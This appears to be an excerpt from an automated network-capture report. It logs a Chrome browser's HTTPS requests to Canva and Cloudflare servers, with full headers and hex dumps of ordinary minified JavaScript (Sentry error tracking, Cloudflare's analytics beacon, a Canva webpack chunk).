                                                                                                                                                                                                                                                    Data Ascii: GET"}function K(t=[]){return"string"==typeof t[0]?t[0]:"Request"in y&&h(t[0],Request)?t[0].url:String(t[0])}let G;let V,Q;function Y(t,n=!1){return e=>{if(!e||Q===e)return;if(function(t){if("keypress"!==t.type)return!1;try{const n=t.target;if(!n||!n.tagNa
                                                                                                                                                                                                                                                    2024-12-19 21:27:21 UTC1369INData Raw: 65 3d 65 74 28 74 29 3b 69 66 28 21 65 29 72 65 74 75 72 6e 3b 63 6f 6e 73 74 20 72 3d 65 2e 6d 65 63 68 61 6e 69 73 6d 3b 69 66 28 65 2e 6d 65 63 68 61 6e 69 73 6d 3d 7b 74 79 70 65 3a 22 67 65 6e 65 72 69 63 22 2c 68 61 6e 64 6c 65 64 3a 21 30 2c 2e 2e 2e 72 2c 2e 2e 2e 6e 7d 2c 6e 26 26 22 64 61 74 61 22 69 6e 20 6e 29 7b 63 6f 6e 73 74 20 74 3d 7b 2e 2e 2e 72 26 26 72 2e 64 61 74 61 2c 2e 2e 2e 6e 2e 64 61 74 61 7d 3b 65 2e 6d 65 63 68 61 6e 69 73 6d 2e 64 61 74 61 3d 74 7d 7d 66 75 6e 63 74 69 6f 6e 20 6f 74 28 74 29 7b 69 66 28 74 26 26 74 2e 5f 5f 73 65 6e 74 72 79 5f 63 61 70 74 75 72 65 64 5f 5f 29 72 65 74 75 72 6e 21 30 3b 74 72 79 7b 4f 28 74 2c 22 5f 5f 73 65 6e 74 72 79 5f 63 61 70 74 75 72 65 64 5f 5f 22 2c 21 30 29 7d 63 61 74 63 68 28 74
                                                                                                                                                                                                                                                    Data Ascii: e=et(t);if(!e)return;const r=e.mechanism;if(e.mechanism={type:"generic",handled:!0,...r,...n},n&&"data"in n){const t={...r&&r.data,...n.data};e.mechanism.data=t}}function ot(t){if(t&&t.__sentry_captured__)return!0;try{O(t,"__sentry_captured__",!0)}catch(t


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    8192.168.2.449750104.16.79.73443600C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-12-19 21:27:21 UTC614OUTGET /beacon.min.js/vcd15cbe7772f49c399c6a5babf22c1241717689176015 HTTP/1.1
                                                                                                                                                                                                                                                    Host: static.cloudflareinsights.com
                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                    Origin: https://www.canva.com
                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                    Referer: https://www.canva.com/
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                    2024-12-19 21:27:22 UTC373INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Thu, 19 Dec 2024 21:27:21 GMT
                                                                                                                                                                                                                                                    Content-Type: text/javascript;charset=UTF-8
                                                                                                                                                                                                                                                    Content-Length: 19948
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=86400
                                                                                                                                                                                                                                                    ETag: W/"2024.6.1"
                                                                                                                                                                                                                                                    Last-Modified: Thu, 06 Jun 2024 15:52:56 GMT
                                                                                                                                                                                                                                                    Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                    CF-RAY: 8f4a79e94e3f7c87-EWR
                                                                                                                                                                                                                                                    2024-12-19 21:27:22 UTC996INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 7b 33 34 33 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 6f 72 28 76 61 72 20 74 3d 5b 5d 2c 6e 3d 30 3b 6e 3c 32 35 36 3b 2b 2b 6e 29 74 5b 6e 5d 3d 28 6e 2b 32 35 36 29 2e 74 6f 53 74 72 69 6e 67 28 31 36 29 2e 73 75 62 73 74 72 28 31 29 3b 65 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 29 7b 76 61 72 20 72 3d 6e 7c 7c 30 2c 69 3d 74 3b 72 65 74 75 72 6e 5b 69 5b 65 5b 72 2b 2b 5d 5d 2c 69 5b 65 5b 72 2b 2b 5d 5d 2c 69 5b 65 5b 72 2b 2b 5d 5d 2c 69 5b 65 5b 72 2b 2b 5d 5d 2c 22 2d 22 2c 69 5b 65 5b 72 2b 2b 5d 5d 2c 69 5b 65 5b 72 2b 2b 5d 5d 2c 22 2d 22 2c 69 5b 65 5b 72 2b 2b 5d 5d 2c 69 5b 65 5b 72 2b 2b 5d 5d 2c 22 2d 22 2c 69 5b 65 5b 72 2b
                                                                                                                                                                                                                                                    Data Ascii: !function(){var e={343:function(e){"use strict";for(var t=[],n=0;n<256;++n)t[n]=(n+256).toString(16).substr(1);e.exports=function(e,n){var r=n||0,i=t;return[i[e[r++]],i[e[r++]],i[e[r++]],i[e[r++]],"-",i[e[r++]],i[e[r++]],"-",i[e[r++]],i[e[r++]],"-",i[e[r+
                                                                                                                                                                                                                                                    2024-12-19 21:27:22 UTC1369INData Raw: 3b 69 66 28 61 5b 36 5d 3d 31 35 26 61 5b 36 5d 7c 36 34 2c 61 5b 38 5d 3d 36 33 26 61 5b 38 5d 7c 31 32 38 2c 74 29 66 6f 72 28 76 61 72 20 63 3d 30 3b 63 3c 31 36 3b 2b 2b 63 29 74 5b 6f 2b 63 5d 3d 61 5b 63 5d 3b 72 65 74 75 72 6e 20 74 7c 7c 69 28 61 29 7d 7d 2c 31 36 38 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 72 3d 74 68 69 73 26 26 74 68 69 73 2e 5f 5f 61 73 73 69 67 6e 7c 7c 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 72 3d 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 7c 7c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 2c 6e 3d 31 2c 72 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 6e 3c 72 3b 6e 2b 2b 29 66 6f 72 28 76 61 72 20 69 20 69 6e 20 74 3d 61 72 67
                                                                                                                                                                                                                                                    Data Ascii: ;if(a[6]=15&a[6]|64,a[8]=63&a[8]|128,t)for(var c=0;c<16;++c)t[o+c]=a[c];return t||i(a)}},168:function(e,t,n){"use strict";var r=this&&this.__assign||function(){return r=Object.assign||function(e){for(var t,n=1,r=arguments.length;n<r;n++)for(var i in t=arg
                                                                                                                                                                                                                                                    2024-12-19 21:27:22 UTC1369INData Raw: 72 63 68 50 61 72 61 6d 73 29 7b 76 61 72 20 79 3d 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 28 67 2e 72 65 70 6c 61 63 65 28 2f 5e 5b 5e 5c 3f 5d 2b 5c 3f 3f 2f 2c 22 22 29 29 2c 68 3d 79 2e 67 65 74 28 22 74 6f 6b 65 6e 22 29 3b 68 26 26 28 70 2e 74 6f 6b 65 6e 3d 68 29 3b 76 61 72 20 54 3d 79 2e 67 65 74 28 22 73 70 61 22 29 3b 70 2e 73 70 61 3d 6e 75 6c 6c 3d 3d 3d 54 7c 7c 22 74 72 75 65 22 3d 3d 3d 54 7d 7d 70 26 26 22 6d 75 6c 74 69 22 21 3d 3d 70 2e 6c 6f 61 64 26 26 28 70 2e 6c 6f 61 64 3d 22 73 69 6e 67 6c 65 22 29 2c 77 69 6e 64 6f 77 2e 5f 5f 63 66 42 65 61 63 6f 6e 3d 70 7d 69 66 28 73 26 26 70 26 26 70 2e 74 6f 6b 65 6e 29 7b 76 61 72 20 77 2c 53 2c 62 3d 21 31 3b 64 6f 63 75 6d 65 6e 74 2e 61 64 64 45 76 65 6e 74 4c 69 73 74
                                                                                                                                                                                                                                                    Data Ascii: rchParams){var y=new URLSearchParams(g.replace(/^[^\?]+\??/,"")),h=y.get("token");h&&(p.token=h);var T=y.get("spa");p.spa=null===T||"true"===T}}p&&"multi"!==p.load&&(p.load="single"),window.__cfBeacon=p}if(s&&p&&p.token){var w,S,b=!1;document.addEventList
                                                                                                                                                                                                                                                    2024-12-19 21:27:22 UTC1369INData Raw: 2e 74 69 6d 69 6e 67 73 56 32 3d 7b 7d 2c 64 2e 76 65 72 73 69 6f 6e 73 2e 74 69 6d 69 6e 67 73 3d 32 2c 64 2e 64 74 3d 6d 5b 30 5d 2e 64 65 6c 69 76 65 72 79 54 79 70 65 2c 64 65 6c 65 74 65 20 64 2e 74 69 6d 69 6e 67 73 2c 74 28 6d 5b 30 5d 2c 64 2e 74 69 6d 69 6e 67 73 56 32 29 29 7d 31 3d 3d 3d 64 2e 76 65 72 73 69 6f 6e 73 2e 74 69 6d 69 6e 67 73 26 26 74 28 63 2c 64 2e 74 69 6d 69 6e 67 73 29 2c 74 28 75 2c 64 2e 6d 65 6d 6f 72 79 29 7d 65 6c 73 65 20 4f 28 64 29 3b 72 65 74 75 72 6e 20 64 2e 66 69 72 73 74 50 61 69 6e 74 3d 6b 28 22 66 69 72 73 74 2d 70 61 69 6e 74 22 29 2c 64 2e 66 69 72 73 74 43 6f 6e 74 65 6e 74 66 75 6c 50 61 69 6e 74 3d 6b 28 22 66 69 72 73 74 2d 63 6f 6e 74 65 6e 74 66 75 6c 2d 70 61 69 6e 74 22 29 2c 70 26 26 28 70 2e 69 63
                                                                                                                                                                                                                                                    Data Ascii: .timingsV2={},d.versions.timings=2,d.dt=m[0].deliveryType,delete d.timings,t(m[0],d.timingsV2))}1===d.versions.timings&&t(c,d.timings),t(u,d.memory)}else O(d);return d.firstPaint=k("first-paint"),d.firstContentfulPaint=k("first-contentful-paint"),p&&(p.ic
                                                                                                                                                                                                                                                    2024-12-19 21:27:22 UTC1369INData Raw: 65 72 65 64 3a 21 30 7d 7d 3b 22 63 6f 6d 70 6c 65 74 65 22 3d 3d 3d 77 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 2e 72 65 61 64 79 53 74 61 74 65 3f 52 28 29 3a 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 6c 6f 61 64 22 2c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 73 65 74 54 69 6d 65 6f 75 74 28 52 29 7d 29 29 3b 76 61 72 20 41 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 4c 26 26 30 3d 3d 3d 76 2e 66 69 6c 74 65 72 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 69 64 3d 3d 3d 6c 7d 29 29 2e 6c 65 6e 67 74 68 7d 2c 5f 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 2e 70 75 73 68 28 7b 69 64 3a 6c 2c 75 72 6c 3a 65 2c 74 73 3a 28 6e 65 77 20 44 61 74 65 29 2e 67 65 74 54 69 6d 65
                                                                                                                                                                                                                                                    Data Ascii: ered:!0}};"complete"===window.document.readyState?R():window.addEventListener("load",(function(){window.setTimeout(R)}));var A=function(){return L&&0===v.filter((function(e){return e.id===l})).length},_=function(e){v.push({id:l,url:e,ts:(new Date).getTime
                                                                                                                                                                                                                                                    2024-12-19 21:27:22 UTC1369INData Raw: 72 63 65 4c 6f 61 64 54 69 6d 65 2c 45 2e 6c 63 70 2e 65 72 64 3d 63 2e 65 6c 65 6d 65 6e 74 52 65 6e 64 65 72 44 65 6c 61 79 2c 45 2e 6c 63 70 2e 69 74 3d 6e 75 6c 6c 3d 3d 3d 28 69 3d 63 2e 6c 63 70 52 65 73 6f 75 72 63 65 45 6e 74 72 79 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 69 3f 76 6f 69 64 20 30 3a 69 2e 69 6e 69 74 69 61 74 6f 72 54 79 70 65 2c 45 2e 6c 63 70 2e 66 70 3d 6e 75 6c 6c 3d 3d 3d 28 61 3d 6e 75 6c 6c 3d 3d 3d 28 6f 3d 63 2e 6c 63 70 45 6e 74 72 79 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 6f 3f 76 6f 69 64 20 30 3a 6f 2e 65 6c 65 6d 65 6e 74 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 61 3f 76 6f 69 64 20 30 3a 61 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 66 65 74 63 68 70 72 69 6f 72 69 74 79 22 29 29 3b 62 72 65 61 6b 3b 63 61 73 65 22 49 4e 50 22
                                                                                                                                                                                                                                                    Data Ascii: rceLoadTime,E.lcp.erd=c.elementRenderDelay,E.lcp.it=null===(i=c.lcpResourceEntry)||void 0===i?void 0:i.initiatorType,E.lcp.fp=null===(a=null===(o=c.lcpEntry)||void 0===o?void 0:o.element)||void 0===a?void 0:a.getAttribute("fetchpriority"));break;case"INP"
                                                                                                                                                                                                                                                    2024-12-19 21:27:22 UTC1369INData Raw: 64 65 64 42 6f 64 79 53 69 7a 65 26 26 28 72 2e 64 65 63 6f 64 65 64 42 6f 64 79 53 69 7a 65 3d 6e 5b 30 5d 2e 64 65 63 6f 64 65 64 42 6f 64 79 53 69 7a 65 29 2c 65 2e 64 74 3d 6e 5b 30 5d 2e 64 65 6c 69 76 65 72 79 54 79 70 65 29 2c 74 28 72 2c 65 2e 74 69 6d 69 6e 67 73 56 32 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 6b 28 65 29 7b 76 61 72 20 74 3b 69 66 28 22 66 69 72 73 74 2d 63 6f 6e 74 65 6e 74 66 75 6c 2d 70 61 69 6e 74 22 3d 3d 3d 65 26 26 45 2e 66 63 70 26 26 45 2e 66 63 70 2e 76 61 6c 75 65 29 72 65 74 75 72 6e 20 45 2e 66 63 70 2e 76 61 6c 75 65 3b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 73 2e 67 65 74 45 6e 74 72 69 65 73 42 79 54 79 70 65 29 7b 76 61 72 20 6e 3d 6e 75 6c 6c 3d 3d 3d 28 74 3d 73 2e 67 65 74 45 6e 74 72 69
                                                                                                                                                                                                                                                    Data Ascii: dedBodySize&&(r.decodedBodySize=n[0].decodedBodySize),e.dt=n[0].deliveryType),t(r,e.timingsV2)}}function k(e){var t;if("first-contentful-paint"===e&&E.fcp&&E.fcp.value)return E.fcp.value;if("function"==typeof s.getEntriesByType){var n=null===(t=s.getEntri
                                                                                                                                                                                                                                                    2024-12-19 21:27:22 UTC1369INData Raw: 76 65 6e 74 54 79 70 65 3d 7b 7d 29 29 5b 72 2e 4c 6f 61 64 3d 31 5d 3d 22 4c 6f 61 64 22 2c 72 5b 72 2e 41 64 64 69 74 69 6f 6e 61 6c 3d 32 5d 3d 22 41 64 64 69 74 69 6f 6e 61 6c 22 2c 72 5b 72 2e 57 65 62 56 69 74 61 6c 73 56 32 3d 33 5d 3d 22 57 65 62 56 69 74 61 6c 73 56 32 22 2c 28 6e 3d 74 2e 46 65 74 63 68 50 72 69 6f 72 69 74 79 7c 7c 28 74 2e 46 65 74 63 68 50 72 69 6f 72 69 74 79 3d 7b 7d 29 29 2e 48 69 67 68 3d 22 68 69 67 68 22 2c 6e 2e 4c 6f 77 3d 22 6c 6f 77 22 2c 6e 2e 41 75 74 6f 3d 22 61 75 74 6f 22 7d 2c 31 30 34 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 21 66 75 6e 63 74 69 6f 6e 28 65 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 74 2c 6e 2c 72 2c 69 2c 6f 2c 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 77
                                                                                                                                                                                                                                                    Data Ascii: ventType={}))[r.Load=1]="Load",r[r.Additional=2]="Additional",r[r.WebVitalsV2=3]="WebVitalsV2",(n=t.FetchPriority||(t.FetchPriority={})).High="high",n.Low="low",n.Auto="auto"},104:function(e,t){!function(e){"use strict";var t,n,r,i,o,a=function(){return w
                                                                                                                                                                                                                                                    2024-12-19 21:27:22 UTC1369INData Raw: 30 3f 72 3d 22 70 72 65 72 65 6e 64 65 72 22 3a 64 6f 63 75 6d 65 6e 74 2e 77 61 73 44 69 73 63 61 72 64 65 64 3f 72 3d 22 72 65 73 74 6f 72 65 22 3a 6e 2e 74 79 70 65 26 26 28 72 3d 6e 2e 74 79 70 65 2e 72 65 70 6c 61 63 65 28 2f 5f 2f 67 2c 22 2d 22 29 29 29 2c 7b 6e 61 6d 65 3a 65 2c 76 61 6c 75 65 3a 76 6f 69 64 20 30 3d 3d 3d 74 3f 2d 31 3a 74 2c 72 61 74 69 6e 67 3a 22 67 6f 6f 64 22 2c 64 65 6c 74 61 3a 30 2c 65 6e 74 72 69 65 73 3a 5b 5d 2c 69 64 3a 22 76 33 2d 22 2e 63 6f 6e 63 61 74 28 44 61 74 65 2e 6e 6f 77 28 29 2c 22 2d 22 29 2e 63 6f 6e 63 61 74 28 4d 61 74 68 2e 66 6c 6f 6f 72 28 38 39 39 39 39 39 39 39 39 39 39 39 39 2a 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 29 2b 31 65 31 32 29 2c 6e 61 76 69 67 61 74 69 6f 6e 54 79 70 65 3a 72 7d 7d 2c
                                                                                                                                                                                                                                                    Data Ascii: 0?r="prerender":document.wasDiscarded?r="restore":n.type&&(r=n.type.replace(/_/g,"-"))),{name:e,value:void 0===t?-1:t,rating:"good",delta:0,entries:[],id:"v3-".concat(Date.now(),"-").concat(Math.floor(8999999999999*Math.random())+1e12),navigationType:r}},
                                                                                                                                                                                                                                                    2024-12-19 21:27:22 UTC1369INData Raw: 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 76 69 73 69 62 69 6c 69 74 79 63 68 61 6e 67 65 22 2c 62 2c 21 30 29 2c 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 70 72 65 72 65 6e 64 65 72 69 6e 67 63 68 61 6e 67 65 22 2c 62 2c 21 30 29 7d 2c 43 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 77 3c 30 26 26 28 77 3d 53 28 29 2c 45 28 29 2c 6c 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 73 65 74 54 69 6d 65 6f 75 74 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 77 3d 53 28 29 2c 45 28 29 7d 29 2c 30 29 7d 29 29 29 2c 7b 67 65 74 20 66 69 72 73 74 48 69 64 64 65 6e 54 69 6d 65 28 29 7b 72 65 74 75 72 6e 20 77 7d 7d 7d 2c 50 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 64 6f 63 75 6d 65 6e 74 2e 70
                                                                                                                                                                                                                                                    Data Ascii: function(){removeEventListener("visibilitychange",b,!0),removeEventListener("prerenderingchange",b,!0)},C=function(){return w<0&&(w=S(),E(),l((function(){setTimeout((function(){w=S(),E()}),0)}))),{get firstHiddenTime(){return w}}},P=function(e){document.p


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    9192.168.2.449751104.16.102.112443600C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-12-19 21:27:22 UTC570OUTGET /web/19jbs9.7484ddd0951f6659.js HTTP/1.1
                                                                                                                                                                                                                                                    Host: static.canva.com
                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                    Origin: https://www.canva.com
                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                    Referer: https://www.canva.com/
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                    2024-12-19 21:27:23 UTC1358INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Thu, 19 Dec 2024 21:27:23 GMT
                                                                                                                                                                                                                                                    Content-Type: text/javascript
                                                                                                                                                                                                                                                    Content-Length: 1435612
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    CF-Ray: 8f4a79f26e4f431f-EWR
                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                    Age: 71052
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=31556926
                                                                                                                                                                                                                                                    ETag: "caa1ecece273993811877d1207762a37"
                                                                                                                                                                                                                                                    Expires: Sat, 20 Dec 2025 03:16:09 GMT
                                                                                                                                                                                                                                                    Last-Modified: Thu, 19 Dec 2024 01:30:32 GMT
                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                    Vary: Origin, Access-Control-Request-Headers, Access-Control-Request-Method, Accept-Encoding
                                                                                                                                                                                                                                                    Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                    Access-Control-Max-Age: 3000
                                                                                                                                                                                                                                                    content-security-policy: script-src 'none'; frame-src 'none'; object-src 'none'; default-src 'none'; style-src 'unsafe-inline'; img-src 'self'; media-src 'self'; form-action 'none'; base-uri 'none'; report-uri https://csp.canva.com/_cspreport?app=s3_static
                                                                                                                                                                                                                                                    timing-allow-origin: https://www.canva.com
                                                                                                                                                                                                                                                    x-amz-expiration: expiry-date="Sat, 20 Dec 2025 00:00:00 GMT", rule-id="Cleanup objects in web/ older than 1 year"
                                                                                                                                                                                                                                                    x-amz-id-2: U2XBkiDgQf6/tG5UFu7rPVIcqlRea2lLgiK++uHVYuND7DrSKWLErbXsGYAiVxuwFNPbp5nOHrQ=
                                                                                                                                                                                                                                                    x-amz-replication-status: COMPLETED
                                                                                                                                                                                                                                                    x-amz-request-id: RB5Y70HV2CCZAFVH
                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                    x-amz-version-id: aJqc3epwcgjccL8qN.5HblWaw5b_Fcrm
                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                    2024-12-19 21:27:23 UTC779INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 5f 63 66 5f 62 6d 3d 62 74 39 76 55 59 4d 4d 70 4c 51 59 53 6c 69 71 46 49 66 56 62 55 47 4e 5f 67 5a 75 65 35 30 5a 68 39 6f 6b 72 55 70 46 77 39 45 2d 31 37 33 34 36 34 33 36 34 33 2d 31 2e 30 2e 31 2e 31 2d 47 31 66 6f 69 41 39 46 57 78 44 75 6a 69 73 78 63 71 50 42 52 72 78 59 4c 57 37 55 53 69 4e 45 4e 77 55 53 34 45 58 66 4f 2e 6f 38 56 76 6e 6d 41 66 71 37 6b 72 54 5a 66 64 78 6f 4d 37 46 38 46 30 6f 2e 47 42 4a 52 32 64 61 47 35 59 56 59 76 49 4f 67 37 77 3b 20 70 61 74 68 3d 2f 3b 20 65 78 70 69 72 65 73 3d 54 68 75 2c 20 31 39 2d 44 65 63 2d 32 34 20 32 31 3a 35 37 3a 32 33 20 47 4d 54 3b 20 64 6f 6d 61 69 6e 3d 2e 63 61 6e 76 61 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61
                                                                                                                                                                                                                                                    Data Ascii: Set-Cookie: __cf_bm=bt9vUYMMpLQYSliqFIfVbUGN_gZue50Zh9okrUpFw9E-1734643643-1.0.1.1-G1foiA9FWxDujisxcqPBRrxYLW7USiNENwUS4EXfO.o8VvnmAfq7krTZfdxoM7F8F0o.GBJR2daG5YVYvIOg7w; path=/; expires=Thu, 19-Dec-24 21:57:23 GMT; domain=.canva.com; HttpOnly; Secure; Sa
                                                                                                                                                                                                                                                    2024-12-19 21:27:23 UTC1369INData Raw: 28 73 65 6c 66 5b 22 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 63 61 6e 76 61 5f 77 65 62 22 5d 20 3d 20 73 65 6c 66 5b 22 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 63 61 6e 76 61 5f 77 65 62 22 5d 20 7c 7c 20 5b 5d 29 2e 70 75 73 68 28 5b 5b 31 33 38 39 5d 2c 7b 0a 0a 2f 2a 2a 2a 2f 20 38 31 33 31 31 30 3a 0a 66 75 6e 63 74 69 6f 6e 28 5f 2c 20 5f 5f 2c 20 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 29 20 7b 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 2e 6e 5f 78 20 3d 20 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 2e 6e 3b 63 6f 6e 73 74 20 5f 5f 77 65 62 5f 72 65 71 5f 5f 20 3d 20 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 3b 73 65 6c 66 2e 5f 66 65 34 64 39 39 65 62 65 30 64 32 64 32 35 39 36 34 36 61 38
                                                                                                                                                                                                                                                    Data Ascii: (self["webpackChunk_canva_web"] = self["webpackChunk_canva_web"] || []).push([[1389],{/***/ 813110:function(_, __, __webpack_require__) {__webpack_require__.n_x = __webpack_require__.n;const __web_req__ = __webpack_require__;self._fe4d99ebe0d2d259646a8
                                                                                                                                                                                                                                                    2024-12-19 21:27:23 UTC1369INData Raw: 2c 4a 61 2c 4b 61 2c 4c 61 2c 4e 61 2c 4f 61 2c 58 61 2c 66 62 2c 64 62 2c 5a 61 2c 61 62 2c 62 62 2c 63 62 2c 65 62 2c 67 62 2c 4d 61 2c 59 61 2c 6d 61 61 2c 6e 61 61 2c 6a 62 2c 6f 61 61 2c 6d 62 2c 70 61 61 2c 77 62 2c 71 61 61 2c 48 62 2c 4a 62 2c 4c 62 2c 4d 62 2c 4f 62 2c 47 62 2c 51 62 2c 52 62 2c 76 61 61 2c 53 62 2c 77 61 61 2c 78 61 61 2c 54 62 2c 55 62 2c 59 62 2c 79 61 61 2c 61 63 2c 63 63 2c 62 63 2c 42 61 61 2c 64 63 2c 6a 63 2c 69 63 2c 43 61 61 2c 73 63 2c 71 63 2c 48 61 61 2c 78 63 2c 49 61 61 2c 76 63 2c 44 63 2c 47 63 2c 4a 63 2c 50 61 61 2c 50 63 2c 52 63 2c 53 63 2c 51 61 61 2c 55 61 61 2c 54 61 61 2c 54 63 2c 52 61 61 2c 56 61 61 2c 57 61 61 2c 59 61 61 2c 62 62 61 2c 61 62 61 2c 63 62 61 2c 5a 61 61 2c 66 62 61 2c 64 64 2c 67 62 61
                                                                                                                                                                                                                                                    Data Ascii: ,Ja,Ka,La,Na,Oa,Xa,fb,db,Za,ab,bb,cb,eb,gb,Ma,Ya,maa,naa,jb,oaa,mb,paa,wb,qaa,Hb,Jb,Lb,Mb,Ob,Gb,Qb,Rb,vaa,Sb,waa,xaa,Tb,Ub,Yb,yaa,ac,cc,bc,Baa,dc,jc,ic,Caa,sc,qc,Haa,xc,Iaa,vc,Dc,Gc,Jc,Paa,Pc,Rc,Sc,Qaa,Uaa,Taa,Tc,Raa,Vaa,Waa,Yaa,bba,aba,cba,Zaa,fba,dd,gba
